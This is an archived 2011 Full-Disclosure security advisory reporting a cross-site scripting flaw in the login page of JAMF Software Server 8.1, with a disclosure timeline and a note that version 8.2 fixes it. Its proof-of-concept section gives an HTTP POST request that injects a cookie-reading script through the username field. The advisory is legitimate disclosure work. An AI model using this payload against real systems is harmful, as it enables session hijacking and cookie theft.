[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] [Foreground Security 2011-001]: Casper Suite (JSS 8.1) Cross-Site Scripting
- To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>, "submit@xxxxxxxxxx" <submit@xxxxxxxxxx>, "bugtraq@xxxxxxxxxxxxxxxxx" <bugtraq@xxxxxxxxxxxxxxxxx>, "Casper@xxxxxxxxxxxxxxxxxxxxx" <Casper@xxxxxxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] [Foreground Security 2011-001]: Casper Suite (JSS 8.1) Cross-Site Scripting
- From: Jose Carlos de Arriba <jcarriba@xxxxxxxxxxxxxxxxxxxxxx>
- Date: Sat, 27 Aug 2011 13:50:35 -0500
============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-001
- Original release date: August 27, 2011
- Discovered by: Jose Carlos de Arriba
- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot)
com)
- Severity: 4.3/10 (Base CVSS Score)
============================================================
I. VULNERABILITY
-------------------------
Casper Suite - JAMF Software Server (JSS) 8.1 Cross-Site Scripting - XSS (prior
versions have not been checked but could be vulnerable too).
II. BACKGROUND
-------------------------
JAMF Software Server (JSS). The JSS is the central core to the Casper Suite and
ties all the other components together.
The Casper Suite simplifies the life of system administrators with a
comprehensive platform to manage Mac OS X computers and iOS mobile devices. The
Casper Suite increases the efficiency of your IT staff, reduces the cost of
ownership, and minimizes liability by providing a framework that enforces
software licensing compliance, security standards, energy usage, and other
organizational rules and requirements.
III. DESCRIPTION
-------------------------
JAMF Software Server (JSS) presents a Cross-Site Scripting vulnerability on its
"username" parameter in the login page, due to an insufficient sanitization on
user supplied data and encoding output.
A malicious user could perform session hijacking or phishing attacks.
IV. PROOF OF CONCEPT
-------------------------
POST /index.html HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=XXXXXXXXXXXXXXX; JSESSIONID=YYYYYYYYYYYYYY;
JSESSIONID=ZZZZZZZZZZZZZZZZZZZZ; tsfrwquc=""
Host: X.X.X.X:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
password=ForegroundSecurity&submit=Login&username="><script>alert(document.cookie)</alert>
V. BUSINESS IMPACT
-------------------------
An attacker could perform session hijacking or phishing attacks.
VI. SYSTEMS AFFECTED
-------------------------
JAMF Software Server (JSS) 8.1 (prior versions have not been checked but could
be vulnerable too).
VII. SOLUTION
-------------------------
Fixed on 8.2 version
VIII. REFERENCES
-------------------------
http://www.jamfsoftware.com/
http://www.foregroundsecurity.com/
http://www.painsec.com
IX. CREDITS
-------------------------
This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at)
foregroundsecurity (dot) com, dade (at) painsec (dot) com).
X. REVISION HISTORY
-------------------------
-
XI. DISCLOSURE TIMELINE
-------------------------
April 25, 2011: Vulnerability discovered by Jose Carlos de Arriba.
April 25, 2011: Vendor contacted by email (No response)
May 11, 2011: Vendor contacted by phone and security advisory sent by email.
July 8, 2011: Vulnerability fixed on 8.2 version release
August 27, 2011: Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"with no
warranties or guarantees of fitness of use or otherwise.
Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba@xxxxxxxxxxxxxxxxxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/